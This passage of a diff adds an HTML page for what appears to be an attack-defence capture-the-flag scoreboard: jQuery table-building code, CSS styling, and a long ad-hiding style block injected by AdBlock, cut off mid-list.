class="+classAlt[i++%2]+">"; + $.each(rows,function(i,r) + { + if(i==1) + { + table_body +="<td ><img width=\"20px\" height==\"20px\" src=\""+r.logo_url+"\"><b> "+r.name+" </b></td>"; + }else if(i==2) + { + if(!r) r="X"; + table_body +="<td>"+r+" <img src=\"http://maliciousnetworks.org/flag_icons/png/"+r.toLowerCase()+".png\"></td>"; + }else if(i==3) + { + table_body +="<td><b>"+r+"</b></td>"; + }else if(i>=5) + { + //active + if(r[0]==1) + { + table_body += "<td> <img src=\"img/on.gif\" width = \"10px\" alt = \"Active\" title = \"Active\">"; + //compromised + if(r[1]==1) + { + table_body += "<img src=\"img/broken.png\" width = \"10px\" alt = \"Service Compromised!\" title = \"Service Compromised!\">"; + }else + { + table_body += "<img src=\"img/locked.png\" width = \"10px\" alt = \"Secure\" title = \"Secure\">"; + } + + }else + { + table_body += "<td> <img src=\"img/off.gif\" width = \"10px\" title = \"Service Down!\" alt = \"Service Down!\">"; + } + + table_body += "</td>"; + + }else + { + table_body +="<td>"+r+"</td>"; + } + }); + table_body += "</tr>"; + }); + table_body += "</tbody>"; + $(table_body).appendTo(tableId); + if(first==1) + { + console.log('new'); + $("#scoretable").tablesorter(); + }else + { + $("#scoretable").trigger("update"); + if(sortList.length >0) + { + //$("#scoretable").trigger("sorton",[[sortList,[0,0]]]); + } + } + }); +} + +$(document).ready(function() +{ + UpdateList("#scoretable"); + setInterval("UpdateList(\"#scoretable\")", 30000); +}); + +</script> + +<style type="text/css"> + +table tr:last-child td:first-child { +-moz-border-radius-bottomleft:15px; +-webkit-border-bottom-left-radius:15px; +border-bottom-left-radius:15px} + +table tr:last-child td:last-child { + -moz-border-radius-bottomright:15px; + -webkit-border-bottom-right-radius:15px; + border-bottom-right-radius:15px} + +table tr:first-child th:first-child { +-moz-border-radius-topleft:15px; +-webkit-border-top-left-radius:15px; +border-top-left-radius:15px} + +table tr:first-child th:last-child { + -moz-border-radius-topright:15px; + -webkit-border-top-right-radius:15px; + border-top-right-radius:15px} + +table.tablesorter { + color:#7494D6; + font-family:arial; + font-size: 12pt; + width: 100%; + text-align: left; + border-collapse: collapse; +} +table.tablesorter thead tr th, table.tablesorter tfoot tr th { + background-color: #28344E; + font-size: 12pt; + padding: 8px; +} +table.tablesorter thead tr .header { + background-image: url(img/bg.gif); + background-repeat: no-repeat; + background-position: center right; + cursor: pointer; +} +table.tablesorter tbody td { + color: #9BBFE9; + padding: 5px; + background-color: #3C527F; + vertical-align: top; +} +table.tablesorter tbody tr.d0 td { + background-color:#34456B; +} +table.tablesorter thead tr .headerSortUp { + background-image: url(img/asc.gif); +} +table.tablesorter thead tr .headerSortDown { + background-image: url(img/desc.gif); +} +table.tablesorter thead tr .headerSortDown, table.tablesorter thead tr .headerSortUp { + background-color: #455D8E; +} +</style> + +</head><style type="text/css" style="display: none !important; ">/*This block of style rules is inserted by AdBlock*/#FFN_Banner_Holder,#FFN_imBox_Container,#RadAd_Skyscraper,#ab_pointer,#adxLeaderboard,#bbccom_leaderboard,#center_banner,#dir_ads_site,#flashad,#footer_adcode,#hbBHeaderSpon,#hiddenHeaderSpon,#navbar_adcode,#p360-format-box,#rightAds,#rightcolumn_adcode,#rm_container,#tads table[align="center"][width="100%"],#tooltipbox[class^="itxt"],#top-advertising,#topMPU,#tracker_advertorial,#ve_threesixty_swf[name="ve_threesixty_swf"],.ad-now,.ad_marquee,.dfpad,.kLink span[id^="preLoadWrap"].preLoadWrap,.prWrap,[id^="ad_block"],[id^="adbrite"],[id^="dclkAds"],[id^="ew"][id$="_bannerDiv"],[id^="konaLayer"],[src*="sixsigmatraffic.com"],a[href^="http://ad."][href*=".doubleclick.net/"],a[href^="http://adserver.adpredictive.com"],div[class^="dms_ad_IDS"],div[id^="adKontekst_"],div[id^="google_ads_div"],div[id^="kona_"][id$="_wrapper"],div[id^="sponsorads"],div[id^="y5_direct"],embed[flashvars*="AdID"],iframe[id^="dapIfM"],iframe[id^="etarget"][id$="banner"],iframe[name^="AdBrite"],iframe[name^="google_ads_"],img[src^="http://cdn.adnxs.com"],script[src="//pagead2.googleadservices.com/pagead/show_ads.js"] + ins > ins > iframe,script[src="http://pagead2.googlesyndication.com/pagead/show_ads.js"] + ins > ins > iframe,table[cellpadding="0"][width="100%"] > * > * > * > div[id^="tpa"],#A9AdsMiddleBoxTop,#A9AdsOutOfStockWidgetTop,#A9AdsServicesWidgetTop,#ADNETwallBanner1,#ADNETwallBanner2,#ADSLOT_1,#ADSLOT_2,#ADSLOT_3,#ADSLOT_4,#ADSLOT_SKYSCRAPER,#ADVERTISE_HERE_ROW,#AD_CONTROL_22,#AD_CONTROL_28,#AD_CONTROL_29,#AD_CONTROL_8,#AD_ROW,#AD_Top,#AD_newsblock,#ADgoogle_newsblock,#ADsmallWrapper,#Ad160x600,#Ad300x250,#Ad3Left,#Ad3Right,#Ad3TextAd,#AdArea,#AdBanner_F1,#AdBar,#AdBar1,#AdBox2,#AdContainer,#AdContainerTop,#AdContentModule_F,#AdDetails_GoogleLinksBottom,#AdDetails_InsureWith,#AdFrame4,#AdHeader,#AdLeaderboardBottom,#AdLeaderboardTop,#AdMiddle,#AdMobileLink,#AdPopUp,#AdRectangle,#AdSenseDiv,#AdSenseResults1_adSenseSponsorDiv,#AdServer,#AdShowcase_F1,#AdSky23,#AdSkyscraper,#AdSpacing,#AdSponsor_SF,#AdSubsectionShowcase_F1,#AdTargetControl1_iframe,#AdTop,#AdTopLeader,#Ad_BelowContent,#Ad_Block,#Ad_Center1,#Ad_Right1,#Ad_RightBottom,#Ad_RightTop,#Ad_Top,#Adbanner,#Adrectangle,#AdsContent,#AdsRight,#AdsWrap,#Ads_BA_CAD,#Ads_BA_CAD2,#Ads_BA_CAD_box,#Ads_BA_SKY,#Ads_CAD,#Ads_OV_BS,#Ads_Special,#AdvertMPU23b,#AdvertPanel,#AdvertiseFrame,#Advertisement,#Advertisements,#Advertorial,#Advertorials,#AdvertsBottom,#AdvertsBottomR,#BANNER_160x600,#BANNER_300x250,#BANNER_728x90,#BannerAd,#BannerAdvert,#BigBoxAd,#BodyAd,#BotAd,#Bottom468x60AD,#ButtonAd,#ClickPop_LayerPop_Container,#CompanyDetailsNarrowGoogleAdsPresentationControl,#CompanyDetailsWideGoogleAdsPresentationControl,#ContentAd,#ContentAd1,#ContentAd2,#ContentAdPlaceHolder1,#ContentAdPlaceHolder2,#ContentAdXXL,#ContentPolepositionAds_Result,#CornerAd,#DartAd300x250,#DivAdEggHeadCafeTopBanner,#FIN_videoplayer_300x250ad,#FooterAd,#FooterAdContainer,#GOOGLE_ADS_47,#GoogleAd1,#GoogleAd2,#GoogleAd3,#GoogleAdsPlaceHolder,#GoogleAdsPresentationControl,#GoogleAdsense,#Google_Adsense_Main,#HEADERAD,#HOME_TOP_RIGHT_BOXAD,#HeaderAD,#HeaderAdsBlock,#HeaderAdsBlockFront,#HeaderBannerAdSpacer,#HeaderTextAd,#HeroAd,#HomeAd1,#HouseAd,#ID_Ad_Sky,#JobsearchResultsAds,#Journal_Ad_125,#Journal_Ad_300,#JuxtapozAds,#KH-contentAd,#LargeRectangleAd,#LeftAd,#LeftAd1,#LeftAdF1,#LeftAdF2,#LftAd,#LoungeAdsDiv,#LowerContentAd,#MPUAdSpace,#MainSponsoredLinks,#Meebo\:AdElement\.Root,#Nightly_adContainer,#NormalAdModule,#OpenXAds,#OverrideAdArea,#PREFOOTER_LEFT_BOXAD,#PREFOOTER_RIGHT_BOXAD,#PageLeaderAd,#PreRollAd,#RelevantAds,#RgtAd1,#RightAd,#RightBottom300x250AD,#RightNavTopAdSpot,#RightSponsoredAd,#SectionAd300-250,#SectionSponsorAd,#SideAdMpu,#SidebarAdContainer,#SkyAd,#SpecialAds,#SponsoredAd,#SponsoredLinks,#TL_footer_advertisement,#TOP_ADROW,#TOP_RIGHT_BOXAD,#Tadspacefoot,#Tadspacehead,#Tadspacemrec,#TextLinkAds,#ThreadAd,#Top468x60AD,#TopAd,#TopAdBox,#TopAdContainer,#TopAdDiv,#TopAdPos,#TopBannerAd,#VM-MPU-adspace,#VM-footer-adspace,#VM-header-adspace,#VM-header-adwrap,#XEadLeaderboard,#XEadSkyscraper,#YahooAdParentContainer,#_ads,#abHeaderAdStreamer,#about_adsbottom,#abovepostads,#ad-1000x90-1,#ad-120x600-sidebar,#ad-120x60Div,#ad-160x600,#ad-160x600-sidebar,#ad-250,#ad-250x300,#ad-300,#ad-300x250,#ad-300x250-1,#ad-300x250-sidebar,#ad-300x250Div,#ad-300x60-1,#ad-376x280,#ad-728,#ad-728x90,#ad-728x90-1,#ad-728x90-leaderboard-top,#ad-728x90-top0,#ad-ads,#ad-article,#ad-banner,#ad-banner-1,#ad-bigbox,#ad-billboard-bottom,#ad-block-125,#ad-bottom,#ad-bottom-wrapper,#ad-box,#ad-box-first,#ad-box-second,#ad-boxes,#ad-bs,#ad-buttons,#ad-colB-1,#ad-column,#ad-container,#ad-content,#ad-contentad,#ad-first-post,#ad-flex-first,#ad-footer,#ad-footprint-160x600,#ad-frame,#ad-front-footer,#ad-front-sponsoredlinks,#ad-fullbanner2,#ad-globalleaderboard,#ad-halfpage,#ad-header,#ad-header-728x90,#ad-horizontal-header,#ad-img,#ad-inner,#ad-label,#ad-leaderboard,#ad-leaderboard-1-container,#ad-leaderboard-bottom,#ad-leaderboard-container,#ad-leaderboard-spot,#ad-leaderboard-top,#ad-left,#ad-left-sidebar-ad-1,#ad-left-sidebar-ad-2,#ad-left-sidebar-ad-3,#ad-links-content,#ad-list-row,#ad-lrec,#ad-medium,#ad-medium-rectangle,#ad-medrec,#ad-middlethree,#ad-middletwo,#ad-module,#ad-mpu,#ad-mpu1-spot,#ad-mpu2,#ad-mpu2-spot,#ad-north,#ad-one,#ad-placard,#ad-placeholder,#ad-rectangle,#ad-right,#ad-right-sidebar-ad-1,#ad-right-sidebar-ad-2,#ad-righttop,#ad-row,#ad-side,#ad-side-text,#ad-sidebar,#ad-sky,#ad-skyscraper,#ad-slot-right,#ad-slug-wrapper,#ad-small-banner,#ad-space,#ad-special,#ad-splash,#ad-sponsors,#ad-spot,#ad-squares,#ad-story-bottom-out,#ad-story-right,#ad-target,#ad-target-Leaderbord,#ad-teaser,#ad-text,#ad-top,#ad-top-banner,#ad-top-text-low,#ad-top-wrap,#ad-tower,#ad-trailerboard-spot,#ad-two,#ad-typ1,#ad-unit,#ad-wrap,#ad-wrap-right,#ad-wrapper,#ad-wrapper1,#ad-yahoo-simple,#ad-zone-1,#ad-zone-2,#ad-zone-inline,#ad01,#ad02,#ad1006,#ad11,#ad125BL,#ad125BR,#ad125TL,#ad125TR,#ad125x125,#ad160x600,#ad160x600right,#ad1Sp,#ad2Sp,#ad300,#ad300-250,#ad300X250,#ad300_x_250,#ad300x100Middle,#ad300x150,#ad300x250,#ad300x250Module,#ad300x60,#ad300x600,#ad300x600_callout,#ad336,#ad336x280,#ad375x85,#ad468,#ad468x60,#ad468x60_top,#ad526x250,#ad600,#ad728,#ad728Mid,#ad728Top,#ad728Wrapper,#ad728top,#ad728x90,#ad728x90_1,#ad90,#adBadges,#adBanner,#adBanner10,#adBanner120x600,#adBanner160x600,#adBanner2,#adBanner3,#adBanner336x280,#adBanner4,#adBanner728,#adBanner9,#adBannerTable,#adBannerTop,#adBar,#adBelt,#adBlock125,#adBlockTop,#adBlocks,#adBottbanner,#adBox,#adBox11,#adBox16,#adBox350,#adBox390,#adCirc300X200,#adCirc_620_100,#adCol,#adColumn,#adCompanionSubstitute,#adComponentWrapper,#adContainer,#adContainer_1,#adContainer_2,#adContainer_3,#adDiv,#adDiv300,#adDiv728,#adFiller,#adFps,#adFtofrs,#adGallery,#adGoogleText,#adGroup1,#adHeader,#adHeaderTop,#adIsland,#adLB,#adLabel,#adLayer,#adLeader,#adLeaderTop,#adLeaderboard,#adMPU,#adMediumRectangle,#adMiddle0Frontpage,#adMiniPremiere,#adMonster1,#adOuter,#adPlaceHolderRight,#adPlacer,#adPosOne,#adRight,#adRight2,#adSPLITCOLUMNTOPRIGHT,#adSenseModule,#adSenseWrapper,#adServer_marginal,#adShortTower,#adSidebar,#adSidebarSq,#adSky,#adSkyscraper,#adSlider,#adSpace,#adSpace0,#adSpace1,#adSpace10,#adSpace11,#adSpace12,#adSpace13,#adSpace14,#adSpace15,#adSpace16,#adSpace17,#adSpace18,#adSpace19,#adSpace2,#adSpace20,#adSpace21,#adSpace22,#adSpace23,#adSpace24,#adSpace25,#adSpace3,#adSpace300_ifrMain,#adSpace4,#adSpace5,#adSpace6,#adSpace7,#adSpace8,#adSpace9,#adSpace_footer,#adSpace_right,#adSpace_top,#adSpacer,#adSpecial,#adSplotlightEm,#adSpot-Leader,#adSpot-banner,#adSpot-island,#adSpot-mrec1,#adSpot-sponsoredlinks,#adSpot-textbox1,#adSpot-widestrip,#adSpotAdvertorial,#adSpotIsland,#adSpotSponsoredLinks,#adSquare,#adStaticA,#adStrip,#adSuperAd,#adSuperPremiere,#adSuperSkyscraper,#adSuperbanner,#adTableCell,#adTag1,#adTag2,#adText,#adTextCustom,#adTextLink,#adText_container,#adTile,#adTop,#adTopContent,#adTopbanner,#adTopboxright,#adTower,#adUnit,#adWrapper,#adZoneTop,#ad_1,#ad_130x250_inhouse,#ad_160x160,#ad_160x600,#ad_190x90,#ad_2,#ad_3,#ad_300,#ad_300_250,#ad_300_250_1,#ad_300a,#ad_300b,#ad_300c,#ad_300x100_m_c,#ad_300x250,#ad_300x250_content_column,#ad_300x250_m_c,#ad_300x250m,#ad_300x90,#ad_4,#ad_468_60,#ad_468x60,#ad_5,#ad_728_foot,#ad_728x90,#ad_728x90_container,#ad_940,#ad_984,#ad_A,#ad_B,#ad_Banner,#ad_C,#ad_C2,#ad_D,#ad_E,#ad_F,#ad_G,#ad_H,#ad_I,#ad_J,#ad_K,#ad_L,#ad_M,#ad_N,#ad_O,#ad_P,#ad_YieldManager-300x250,#ad_YieldManager-728x90,#ad_adsense,#ad_after_navbar,#ad_anchor,#ad_area,#ad_banner,#ad_bannerManage_1,#ad_banner_top,#ad_banners,#ad_bar,#ad_bellow_post,#ad_bigsize_wrapper,#ad_block_1,#ad_block_2,#ad_bottom,#ad_box,#ad_box_colspan,#ad_box_top,#ad_branding,#ad_bs_area,#ad_buttons,#ad_center_monster,#ad_circ300x250,#ad_cna2,#ad_cont,#ad_container,#ad_container_0,#ad_container_marginal,#ad_container_side,#ad_container_sidebar,#ad_container_top,#ad_content_top,#ad_content_wrap,#ad_feature,#ad_firstpost,#ad_footer,#ad_frame,#ad_front_three,#ad_fullbanner,#ad_gallery,#ad_global_header,#ad_h3,#ad_haha_1,#ad_haha_4,#ad_halfpage,#ad_head,#ad_header,#ad_holder,#ad_horizontal,#ad_horseshoe_left,#ad_horseshoe_right,#ad_horseshoe_spacer,#ad_horseshoe_top,#ad_hotpots,#ad_in_arti,#ad_island,#ad_label,#ad_large_rectangular,#ad_lastpost,#ad_layer,#ad_layer2,#ad_leader,#ad_leaderBoard,#ad_leaderboard,#ad_leaderboard728x90,#ad_leaderboard_top,#ad_left,#ad_lnk,#ad_lrec,#ad_lwr_square,#ad_main,#ad_medium_rectangle,#ad_medium_rectangular,#ad_mediumrectangle,#ad_menu_header,#ad_message,#ad_middle,#ad_most_pop_234x60_req_wrapper,#ad_mpu,#ad_mpu300x250,#ad_mpuav,#ad_mrcontent,#ad_newsletter,#ad_overlay,#ad_place,#ad_play_300,#ad_rect,#ad_rect_body,#ad_rect_bottom,#ad_rectangle,#ad_rectangle_medium,#ad_related_links_div,#ad_related_links_div_program,#ad_replace_div_0,#ad_replace_div_1,#ad_report_leaderboard,#ad_report_rectangle,#ad_results,#ad_right,#ad_right_main,#ad_ros_tower,#ad_rr_1,#ad_script_head,#ad_sec,#ad_sec_div,#ad_sgd,#ad_sidebar,#ad_sidebar1,#ad_sidebar2,#ad_sidebar3,#ad_sky,#ad_skyscraper,#ad_skyscraper160x600,#ad_skyscraper_text,#ad_slot_leaderboard,#ad_slot_livesky,#ad_slot_sky_top,#ad_space,#ad_square,#ad_ss,#ad_table,#ad_term_bottom_place,#ad_text:not(textarea),#ad_thread_first_post_content,#ad_top,#ad_top_holder,#ad_tp_banner_1,#ad_tp_banner_2,#ad_txt,#ad_unit,#ad_vertical,#ad_wide,#ad_wide_box,#ad_widget,#ad_window,#ad_wrap,#ad_wrapper,#adaptvcompanion,#adbForum,#adbanner,#adbar,#adbig,#adbnr,#adboard,#adbody,#adbottom,#adbox,#adbox1,#adbox2,#adbutton,#adclear,#adcode,#adcode1,#adcode2,#adcode3,#adcode4,#adcolumnwrapper,#adcontainer,#adcontainer1,#adcontainerRight,#adcontainsm,#adcontent,#adcontent1,#adcontrolPushSite,#add_ciao2,#addbottomleft,#addiv-bottom,#addiv-top,#adfooter,#adfooter_728x90,#adframe:not(frameset),#adhead,#adhead_g,#adheader,#adhome,#adiframe1_iframe,#adiframe2_iframe,#adiframe3_iframe,#adimg,#adition_content_ad,#adlabel,#adlabelFooter,#adlayer,#adlayerContainer,#adlayer_back,#adlayerad,#adleaderboard,#adleaderboard_flex,#adleaderboardb,#adleaderboardb_flex,#adleft,#adlinks,#adlinkws,#adlrec,#admanager_leaderboard,#admid,#admiddle3center,#admiddle3left,#adposition,#adposition-C,#adposition-FPMM,#adposition1,#adposition2,#adposition3,#adposition4,#adrectangle,#adrectanglea,#adrectanglea_flex,#adrectangleb,#adrectangleb_flex,#adrig,#adright,#adright2,#adrighthome,#ads-250,#ads-468,#ads-area,#ads-block,#ads-bot,#ads-bottom,#ads-col,#ads-dell,#ads-footer,#ads-footer-inner,#ads-horizontal,#ads-indextext,#ads-leaderboard1,#ads-lrec,#ads-main,#ads-menu,#ads-middle,#ads-prices,#ads-rhs,#ads-right,#ads-sponsored-boxes,#ads-top,#ads-vers7,#ads-wrapper,#ads120,#ads125,#ads160left,#ads300,#ads300-250,#ads300Bottom,#ads300Top,#ads315,#ads336x280,#ads728,#ads728bottom,#ads728top,#ads790,#adsBox-460_left,#adsBox-dynamic-right,#adsBoxResultsPage,#adsContent,#adsDisplay,#adsDiv1,#adsDiv2,#adsDiv3,#adsDiv4,#adsDiv5,#adsDiv6,#adsDiv7,#adsHeader,#adsID,#ads_160,#ads_300,#ads_728,#ads_banner,#ads_belowforumlist,#ads_belownav,#ads_bottom,#ads_bottom_inner,#ads_bottom_outer,#ads_box,#ads_button,#ads_catDiv,#ads_container,#ads_footer,#ads_fullsize,#ads_halfsize,#ads_header,#ads_html1,#ads_html2,#ads_inner,#ads_lb,#ads_medrect,#ads_notice,#ads_right,#ads_right_sidebar,#ads_sidebar_roadblock,#ads_space,#ads_text,#ads_top,#ads_topbanner,#ads_watch_top_square,#ads_zone27,#adsbottom,#adsbox,#adsbox-left,#adsbox-right,#adscolumn,#adsd_contentad_r1,#adsd_contentad_r2,#adsd_contentad_r3,#adsd_topbanner,#adsd_txt_sky,#adsdiv,#adsection,#adsense,#adsense-2,#adsense-header,#adsense-new,#adsense-tag,#adsense-text,#adsense03,#adsense04,#adsense05,#adsense1,#adsenseLeft,#adsenseOne,#adsenseWrap,#adsense_article_left,#adsense_block,#adsense_box,#adsense_box_video,#adsense_inline,#adsense_leaderboard,#adsense_overlay,#adsense_placeholder_2,#adsenseheader,#adsensetopplay,#adsensewidget-3,#adserv,#adshometop,#adsimage,#adskinlink,#adsky,#adskyscraper,#adslider,#adslot,#adsmiddle,#adsonar,#adspace,#adspace-1,#adspace-300x250,#adspace-leaderboard-top,#adspace300x250,#adspaceBox,#adspaceBox300,#adspace_header,#adspace_leaderboard,#adspacer,#adsponsorImg,#adspot,#adspot-1,#adspot-149x170,#adspot-1x4,#adspot-2,#adspot-295x60,#adspot-2a,#adspot-2b,#adspot-300x110-pos-1,#adspot-300x125,#adspot-300x250-pos-1,#adspot-300x250-pos-2,#adspot-468x60-pos-2,#adspot-a,#adspot300x250,#adspot_220x90,#adspot_300x250,#adspot_468x60,#adspot_728x90,#adsquare,#adsright,#adstop,#adtab,#adtag_right_side,#adtagfooter,#adtagheader,#adtagrightcol,#adtaily-widget-light,#adtech_0,#adtech_1,#adtech_2,#adtech_3,#adtech_googleslot_03c,#adtech_takeover,#adtext,#adtop,#adtophp,#adtxt,#adv-300,#adv-leaderboard,#adv-left,#adv-masthead,#adv-middle,#adv-mpux,#adv-x36,#adv-x37,#adv-x38,#adv-x39,#adv-x40,#adv1,#adv300bottom { display:none !important; } #adv300top,#adv728,#adv_300,#adv_728,#adv_border,#adv_google_300,#adv_google_728,#adv_halfpage,#adv_halfpage_title,#adv_leaderboard,#adv_sky,#adv_top_banner_wrapper,#adver1,#adver2,#adver3,#adver4,#adver5,#adver6,#adver7,#advert-1,#advert-120,#advert-boomer,#advert-display,#advert-header,#advert-leaderboard,#advert-links-bottom,#advert-skyscraper,#advert-top,#advert1,#advertBanner,#advertContainer,#advertDB,#advertRight,#advertSection,#advert_125x125,#advert_250x250,#advert_box,#advert_home01,#advert_leaderboard,#advert_lrec_format,#advert_mid,#advert_mpu,#advert_mpu_1,#advert_right_skyscraper,#advert_sky,#advertbox,#advertbox2,#advertbox3,#advertbox4,#adverthome,#advertise,#advertise-here,#advertise-here-sidebar,#advertise-now,#advertise1,#advertiseHere,#advertisement1,#advertisement160x600,#advertisement3,#advertisement728x90,#advertisementHorizontal,#advertisementLigatus,#advertisementPrio2,#advertisementRight,#advertisementRightcolumn0,#advertisementRightcolumn1,#advertisementsarticle,#advertiser-container,#advertiserLinks,#advertisers,#advertising,#advertising-banner,#advertising-caption,#advertising-container,#advertising-control,#advertising-skyscraper,#advertising-top,#advertising2,#advertisingModule160x600,#advertisingModule728x90,#advertisingTopWrapper,#advertising_btm,#advertising_contentad,#advertising_horiz_cont,#advertisment,#advertismentElementInUniversalbox,#advertorial,#advertorial_red_listblock,#adverts,#adverts-top-container,#adverts-top-left,#adverts-top-middle,#adverts-top-right,#advertsingle,#advertspace,#advheader,#advsingle,#advt,#advtext,#advtop,#adwhitepaperwidget,#adwin_rec,#adwith,#adwords-4-container,#adwrapper,#adxBigAd,#adxMiddle5,#adxSponLink,#adxSponLinkA,#adxtop,#adxtop2,#adzbanner,#adzerk,#adzerk1,#adzerk2,#adzone,#adzoneBANNER,#adzoneheader,#afc-container,#affinityBannerAd,#after-content-ads,#after-header-ad-left,#after-header-ad-right,#after-header-ads,#agi-ad300x250,#agi-ad300x250overlay,#agi-sponsored,#alert_ads,#anchorAd,#annoying_ad,#ap_adframe,#ap_cu_overlay,#ap_cu_wrapper,#apiBackgroundAd,#apiTopAdWrap,#apmNADiv,#apolload,#araHealthSponsorAd,#area-adcenter,#area1ads,#article-ad,#article-ad-container,#article-box-ad,#articleAdReplacement,#articleLeftAdColumn,#articleSideAd,#article_ad,#article_ad_container,#article_box_ad,#articlead1,#articlead2,#asideads,#asinglead,#atlasAdDivGame,#awds-nt1-ad,#babAdTop,#banner-300x250,#banner-ad,#banner-ad-container,#banner-ads,#banner250x250,#banner300x250,#banner468x60,#banner728x90,#bannerAd,#bannerAdTop,#bannerAdWrapper,#bannerAd_ctr,#bannerAd_rdr,#banner_160x600,#banner_300_250,#banner_ad,#banner_ad_footer,#banner_ad_module,#banner_admicro,#banner_ads,#banner_advertisement,#banner_content_ad,#banner_topad,#bannerad,#bannerad2,#baseAdvertising,#basket-adContainer,#bbccom_mpu,#bbo_ad1,#bg-footer-ads,#bg-footer-ads2,#bg_YieldManager-160x600,#bg_YieldManager-300x250,#bg_YieldManager-728x90,#bigAd,#bigBoxAd,#bigad300outer,#bigadbox,#bigadframe,#bigadspot,#billboard_ad,#block-ad_cube-1,#block-openads-0,#block-openads-1,#block-openads-2,#block-openads-3,#block-openads-4,#block-openads-5,#block-spti_ga-spti_ga_adwords,#block-thewrap_ads_250x300-0,#block_advert,#block_advertisement,#blog-ad,#blog_ad_content,#blog_ad_opa,#blog_ad_right,#blog_ad_top,#blox-big-ad,#blox-big-ad-bottom,#blox-big-ad-top,#blox-halfpage-ad,#blox-tile-ad,#blox-tower-ad,#body_728_ad,#book-ad,#botad,#bott_ad2,#bott_ad2_300,#bottom-ad,#bottom-ad-container,#bottom-ad-tray,#bottom-ad-wrapper,#bottom-ads,#bottomAd,#bottomAdCCBucket,#bottomAdContainer,#bottomAdSense,#bottomAdSenseDiv,#bottomAds,#bottomAdvBox,#bottomContentAd,#bottomRightAd,#bottomRightAdSpace,#bottom_ad,#bottom_ad_area,#bottom_ad_unit,#bottom_ads,#bottom_banner_ad,#bottom_overture,#bottom_sponsor_ads,#bottom_sponsored_links,#bottom_text_ad,#bottomad,#bottomads,#bottomadsense,#bottomadwrapper,#bottomleaderboardad,#box-ad-section,#box-ads-small-1,#box-ads-small-2,#box-content-ad,#box-googleadsense-1,#box-googleadsense-r,#box1ad,#boxAd300,#boxAdContainer,#boxAdvert,#box_ad,#box_advertisment,#box_mod_googleadsense,#boxad1,#boxad2,#boxad3,#boxad4,#boxad5,#boxads,#bpAd,#bps-header-ad-container,#btnAds,#btnads,#btr_horiz_ad,#burn_header_ad,#button-ads-horizontal,#button-ads-vertical,#buttonAdWrapper1,#buttonAdWrapper2,#buttonAds,#buttonAdsContainer,#button_ad_container,#button_ad_wrap,#button_ads,#buttonad,#buy-sell-ads,#c4ad-Middle1,#c_ad_sb,#c_ad_sky,#caAdLarger,#catad,#category-ad,#cellAd,#channel_ad,#channel_ads,#ciHomeRHSAdslot,#circ_ad,#closeable-ad,#cmn_ad_box,#cmn_toolbar_ad,#cnnAboveFoldBelowAd,#cnnRR336ad,#cnnSponsoredPods,#cnnTopAd,#cnnVPAd,#col3_advertising,#colAd,#colRightAd,#collapseobj_adsection,#column4-google-ads,#comments-ad-container,#commercial_ads,#common_right_ad_wrapper,#common_right_lower_ad_wrapper,#common_right_lower_adspace,#common_right_lower_player_ad_wrapper,#common_right_lower_player_adspace,#common_right_player_ad_wrapper,#common_right_player_adspace,#common_right_right_adspace,#common_top_adspace,#comp_AdsLeaderboardTop,#companion-ad,#companionAd,#companionAdDiv,#companionad,#container-righttopads,#container-topleftads,#containerLocalAds,#containerLocalAdsInner,#containerMrecAd,#containerSqAd,#content-ad-header,#content-header-ad,#content-left-ad,#content-right-ad,#contentAd,#contentBoxad,#contentTopAds2,#content_ad,#content_ad_square,#content_ad_top,#content_ads_content,#content_box_300body_sponsoredoffers,#content_box_adright300_google,#content_lower_center_right_ad,#content_mpu,#contentad,#contentad_imtext,#contentad_right,#contentads,#contentinlineAd,#contents_post_ad,#contextad,#contextual-ads,#contextual-ads-block,#contextualad,#coverADS,#coverads,#ctl00_Adspace_Top_Height,#ctl00_BottomAd,#ctl00_ContentMain_BanManAd468_BanManAd,#ctl00_ContentPlaceHolder1_blockAdd_divAdvert,#ctl00_ContentRightColumn_RightColumn_Ad1_BanManAd,#ctl00_ContentRightColumn_RightColumn_Ad2_BanManAd,#ctl00_ContentRightColumn_RightColumn_PremiumAd1_ucBanMan_BanManAd,#ctl00_LHTowerAd,#ctl00_LeftHandAd,#ctl00_MasterHolder_IBanner_adHolder,#ctl00_TopAd,#ctl00_TowerAd,#ctl00_VBanner_adHolder,#ctl00__Content__RepeaterReplies_ctl03__AdReply,#ctl00_abot_bb,#ctl00_adFooter,#ctl00_advert_LargeMPU_div_AdPlaceHolder,#ctl00_atop_bt,#ctl00_cphMain_hlAd1,#ctl00_cphMain_hlAd2,#ctl00_cphMain_hlAd3,#ctl00_ctl00_MainPlaceHolder_itvAdSkyscraper,#ctl00_ctl00_ctl00_Main_Main_PlaceHolderGoogleTopBanner_MPTopBannerAd,#ctl00_ctl00_ctl00_Main_Main_SideBar_MPSideAd,#ctl00_dlTilesAds,#ctl00_m_skinTracker_m_adLBL,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayMiddle_pnlAffiliateAdvert,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayRight_pnlAffiliateAdvert,#ctl00_topAd,#ctrlsponsored,#cubeAd,#cube_ads,#cube_ads_inner,#cubead,#cubead-2,#currencies-sponsored-by,#custom-advert-leadboard-spacer,#dAdverts,#dItemBox_ads,#dart_160x600,#dc-display-right-ad-1,#dcadSpot-Leader,#dcadSpot-LeaderFooter,#dcol-sponsored,#defer-adright,#detail_page_vid_topads,#div-gpt-ad-1,#div-gpt-ad-2,#div-gpt-ad-3,#div-gpt-ad-4,#divAd,#divAdBox,#divAdWrapper,#divAdvertisement,#divBottomad1,#divBottomad2,#divDoubleAd,#divLeftAd12,#divLeftRecAd,#divMenuAds,#divWNAdHeader,#divWrapper_Ad,#div_ad_leaderboard,#div_video_ads,#dlads,#dni-header-ad,#dnn_adLeaderBoard2008,#dnn_ad_banner,#download_ads,#dp_ads1,#ds-mpu,#ds_ad_north_leaderboard,#editorsmpu,#em_ad_superbanner,#embedded-ad,#evotopTen_advert,#ex-ligatus,#exads,#extra-search-ads,#fb_adbox,#fb_rightadpanel,#featAds,#featuread,#featured-advertisements,#featuredAdContainer2,#featuredAds,#featured_ad_links,#feed_links_ad_container,#file_sponsored_link,#first-300-ad,#first-adlayer,#first_ad_unit,#firstad,#flAdData6,#fl_hdrAd,#flash_ads_1,#flexiad,#floatingAd,#floating_ad_container,#foot-ad-1,#footad,#footer-ad,#footer-ads,#footer-advert,#footer-adverts,#footer-sponsored,#footerAd,#footerAdDiv,#footerAds,#footerAdvertisement,#footerAdverts,#footer_ad,#footer_ad_01,#footer_ad_block,#footer_ad_container,#footer_ad_modules,#footer_ads,#footer_adspace,#footer_text_ad,#footerad,#footerads,#footeradsbox,#forum_top_ad,#four_ads,#fpad1,#fpad2,#fpv_companionad,#fr_ad_center,#frame_admain,#frnAdSky,#frnBannerAd,#frnContentAd,#front_ad728,#front_a